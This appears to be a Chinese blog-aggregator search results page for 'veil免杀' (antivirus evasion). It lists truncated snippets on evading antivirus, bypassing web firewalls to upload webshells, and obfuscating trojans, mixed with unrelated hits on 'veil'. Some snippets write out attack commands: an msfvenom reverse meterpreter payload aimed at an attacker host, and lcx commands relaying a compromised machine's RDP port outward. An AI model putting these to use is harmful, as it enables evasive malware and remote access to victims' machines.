veil免杀

20169212 2016-2017-2 《网络攻防实践》第十四周学习总结

201692122016-2017-2《网络攻防实践》第十四周学习总结实践内容:(1)理解免杀技术原理(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
Jarvan_D·2017-06-04 20:00

安全漏洞--基于NDAY和0DAY漏洞免杀技巧

一概念简介0day中的0表示zero,早期的0day表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。0day是一个统称,所有的破解都可以叫0day。简而言之,0day就是代表还没有公开的漏洞,nday就是代表已经公开了的漏洞。漏洞开发者在利用0day和Nday时,除了在逃过windos的自身安全机
5t4rk·2017-05-09 13:11

使用MSF生成的shellcode打造免杀payload

环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode:msfvenom-pwindows/meterpreter/reverse_httplhost=192.168.114.140lport=5555-fcwin7中使用Visualstudio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):选择空项
MickeyMouse1928·2017-05-04 12:34

免杀,加壳

介绍下加壳、脱壳以及如何病毒免杀技术与原理在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。
ckkyjtqlt·2017-04-12 12:17

MYSQL分页limit速度太慢优化方法

limit200000,10的时候数据读取就很慢,可以按照一下方法解决最近一个网站的服务器评论被人刷死,导致mysql数据库异常发生toomanyopenconnections引发的SQL语句:SELECT a.uid, a.veil
北京看看·2017-04-08 22:16

20145120黄玄曦《网络对抗》免杀原理与实践

20145120黄玄曦《网络对抗》免杀原理与实践基础问题回答杀软是如何检测出恶意代码的?
20199107hxx·2017-03-27 21:00

恶意代码--杀毒软件查杀的对抗技巧分享

静态特征码免杀针对kingsoft,macafee、Avira、trendmicro免杀效果比较明显。如何绕过静态查杀?1.1动态调用API1特征码定位;2动态获取API地址;3自己调用;1.2代码
5t4rk·2017-03-16 11:39

病毒木马查杀实战第026篇:“白加黑”恶意程序研究(上)

而这类的恶意程序为了避免被发现以及被查杀,往往会采用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者很多时候也是脑洞大开,为了对抗杀软的查杀也是无所不用其极。
ioio_jy·2017-02-25 14:00

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:WindowsServer2003、Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用
qq_27446553·2017-01-18 02:30

分享一些无特征PHP一句话

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。
狼人:-)·2017-01-08 07:28

我的WafBypass之道(upload篇)

xianzhi.aliyun.com/forum/read/458.html0x00前言玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀
justincom·2016-12-03 23:23

病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御

JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会围绕它
ioio_jy·2016-11-25 15:00

[置顶] 【目录】我的原创技术视频教程

吾爱动画大赛2016参赛作品】-JS下载者脚本木马的分析与防御简介:本视频是我参加2016年吾爱动画大赛的参赛作品,为大家简单讲解了一下JavaScript下载者木马的分析与防御技术,内容包括JS的基本免杀技术
ioio_jy·2016-11-03 12:00

kali下的免杀veil安装步骤

1.免杀的过程是双向的,如果你就有一台笔记本的条件下,那就建议你安装虚拟机VMwareWorkstation(一般的软件管理管家都会下载到如金山毒霸-软件管理)2.kali软件包下载地址:http://
cong86·2016-08-01 21:24

Android App 免杀教程

如何让你的app一直在运行状态呢?默认情况下,不做任何跨进程部署配置的话,每个androidapp运行在单独一个虚拟机上,每个虚拟机对应一个进程。当app被系统回收或者是被用户主动杀掉(通过app管理软件),进程就彻底退出了。在有些场景,app所在的进程退出了,我们希望还能做一些操作。比如,app被卸载后(卸载会先退出运行),我们希望跳转浏览器做一些卸载原因的调查问卷;或者为了优化体验,提高app
iRuoBin·2016-06-28 11:49

MYSQL分页limit速度太慢优化方法

的时候数据读取就很慢,可以按照一下方法解决最近一个网站的服务器评论被人刷死,导致MySQL数据库异常发生toomanyopenconnections引发的SQL语句 代码如下复制代码SELECTa.uid,a.veil
zy_281870667·2016-06-07 16:00

导出当前域内所有用户hash的技术整理

域控:server2008r2杀毒软件:已安装*域控权限:可使用netuse远程登陆,不使用33890x02测试方法:(1)mimikatz:hash数量:只能抓取登陆过的用户hash,无法抓取所有用户免杀
citelao·2016-03-21 17:11

Atitit.木马病毒的免杀原理---sikuli 的使用

Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api11.1. 3. Write code!12. 
attilaxAti·2016-03-11 20:00

Atitit.木马病毒的免杀原理---sikuli 的使用

Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api11.1. 3. Write code!12. 
attilaxAti·2016-03-11 20:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
attilaxAti·2016-03-08 16:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
attilaxAti·2016-03-08 16:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
u010850027·2016-03-08 16:00

小甲鱼之浅谈杀与不杀

第一篇杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩。
进击的陡壁·2016-02-18 14:00

JavaScript Phishing

0x01简介特点:通过cmd执行代码即可弹回shell优势:免杀简便较隐蔽利用思路:综合其优势特点,JavaScript作为PhishingPayload有着意想不到的效果,下面就结合相关漏洞做简要介绍
qq_27446553·2016-01-27 17:00

[免杀] Delphi 内嵌ASM获取kernel32.dll的模块句柄 XP/Vista/WIN7

///XP/Vista/WIN7以及X86/X64通吃functionKernel32Handle():HMODULE;{$IFDEFCPUX64}asm movrbx,$60 movrax,[gs:rbx]  //peb movrax,[rax+$18] //LDR movrax,[rax+$30] //InLoadOrderModuleList.Blink, movrax,[rax] //[_
伽罗kapple·2016-01-25 18:00

废土之王隐藏关卡怎么进 7个隐藏关卡进入方法

7处隐秘区域:1、绿洲(水下)在沙漠关(1-1、1-2、1-3)任意一关之中,开局尽量避免杀敌人,穿梭与敌军之中,寻找红箱子黄箱子绿罐子,把它们都打开(顺序不限)——然后Boss就会在附近冲出来,尽快秒掉他
佚名·2016-01-06 09:59

多维数据查询效率分析(2)

还是从建表开始:MariaDB[veil]>showcr
·2015-12-09 10:25

in front of与in the front of

I'm the girl in the veil who stomped on your heart in front of your entire family!
·2015-11-12 19:51

stomp与veil用法

I'm the girl in the veil who stomped on your heart in front of your entire family!
·2015-11-12 19:50

C++源代码免杀之函数的动态调用

最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。
·2015-11-12 18:22

Android应用源码安卓短信拦截木马项目源码

木马apk重新签名后手机360免杀
·2015-11-12 13:18

免杀常用手段

首先做免杀大家都知道免杀分为文件免杀,内存免杀,和行为免杀
·2015-11-12 12:29

机械码,又称机器码.

一、搞免杀修改特征码需要熟练掌握的全部汇编知识一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码
·2015-11-12 11:53

VBScript.Encode打造的免杀木马

        SCRENC.EXE这是一个运行在DOS   PROMAPT的命令工具,它使脚本设计者可以对最终的脚本进行编码,从而使   Web   主机和   Web   客户不能查看或修改它们的源代码。不过有一点需要注意的是加密后的程序要求用户的游览器必须使用Intern
·2015-11-12 10:25

Veil—绕过杀毒软件的payload生成器 -中国寒龙

程序截图: 注意:请不要作坏事,不要向VirusTotal提交任何payload 在几乎所有的评估中,渗透测试人员必须与杀毒软件做斗争。每次斗争的水准依赖于杀毒软件的解决方案以及其定义等。在过去的半年中,我着手于研究如何绕过杀毒软件。两月前,仔细回顾了一下自己最近的研究,以使其更加有用。下面是我设定的一些目标: ·绕过在大多数网络环境下能遇到的杀毒软件 ·利
·2015-11-11 12:22

局域网入侵检测过程详解

入侵工具:一般要用到三个:NTscan变态扫描器,Recton–D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关
·2015-11-11 11:26

利用网页挂马拿服务器的一种设想

步骤如下: 准备工作 1.做好远控木马,做好免杀,找个网马生成器生成网马。然后传到一个空间,并做好相应的加密过的JS引用文件。
·2015-11-11 08:15

驱动级的特征码修改——终级免杀之PcShare

当然是免杀。加壳是没用的,要改特征码。改文件和内存 特征码在前几
·2015-11-11 05:41

彩笔在kali安装 veil 的过程 and 使用

Veil-Evasion.tar.gz 链接: http://pan.baidu.com/s/1c05xcBY 密码: w717 need.tar.gz 链接: http://pan.baidu.com
·2015-11-11 02:13

nc.exe 使用方法

《nc.exe免杀版》瑞士***nc.exe下载附使用方法做网络安全测试在命令行下使用的网络监听工具。 
lilei754212328·2015-11-09 13:56

主动嗅探器sniffact出炉

~任何想找的信息,只要你能分析因为专业课需要,我在做一个对联创进行重放攻击的程序时发现,底层嗅探部分已成套路,每次做重放攻击都要重新实现十分繁琐,而且C/C++虽然方便操作底层,但进行着些简单的操作未免杀鸡用牛刀
·2015-11-03 21:57

meterpreter

这促使我决定一窥meterpreter的究竟,以了解其工作原理和流程,从而方便自定义载荷进行免杀,或者予以改造做远控。后来发现,直
·2015-11-03 21:35

源码免杀笔记

最近没什么心情写博客,似乎停止不前了,唉,越来越懒了,不知道怎么回事,整理以前的笔记,这个免杀的,不知道内容过时了没。 各个杀毒软件查杀特点不一样,大致总结以下,API函数,字符串,代码段,资源段。
·2015-11-02 18:14

lcx源代码以及免杀的研究

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
·2015-11-02 14:04

江民杀毒软件KV2008 正式版下载

全新研发推出的计算机反病毒与网络安全防护软件,是全球首家具有灾难恢复功能的智能主动防御杀毒软件.江民杀毒软件KV2008采用了新一代智能分级高速杀毒引擎,占用系统资源少,扫描速度得到了大幅提升,突破了“灾难恢复”和 “病毒免杀
·2015-11-02 09:55

网页解密

其实,网页脚本加密一般是用于网页木马的免杀,一般来说入侵者成功取得Webshell权限以后就会对整个网站进行批量挂马,其中挂马的语句大多是“iframe”,也有些为了隐蔽会插入Flash(geturl)
·2015-11-01 09:11

病毒木马凶猛啊!

还有盗QQ号码的所谓免杀木马,倒 N个IEXPLORE.EXE不停的启动,出错误,连接某些IP。TEMP目录下生成1.exe,2.exe.......症状太多了。
·2015-10-31 11:53

lcx.exe内网转发命令教程 + LCX免杀下载

  作者: 小健   本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 12
·2015-10-30 15:44

一句话木马的免杀

在入侵过程中,我们常常会遇到这样的问题,因为大马太大,而不能上传,怎么办,这个时候就只能用小马来辅助,但是,小马的语句又被杀,今天我们来说说一句话小马的免杀方法。
·2015-10-27 15:13

汇编64讲(搞免杀、破解必看)在线观看

下载地址(也可以在线观看) mms://221.11.20.228/hbywjjk/1/000.asf mms://221.11.20.228/hbywjjk/2/000.asf mms://221.11.20.228/hbywjjk/3/000.asf mms://221.11.20.228/hbywjjk/4/000.asf mms://221.11.20.228/hbywjjk/5
·2015-10-27 14:02
上一页 16 17 18 19 20 21 22 23 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他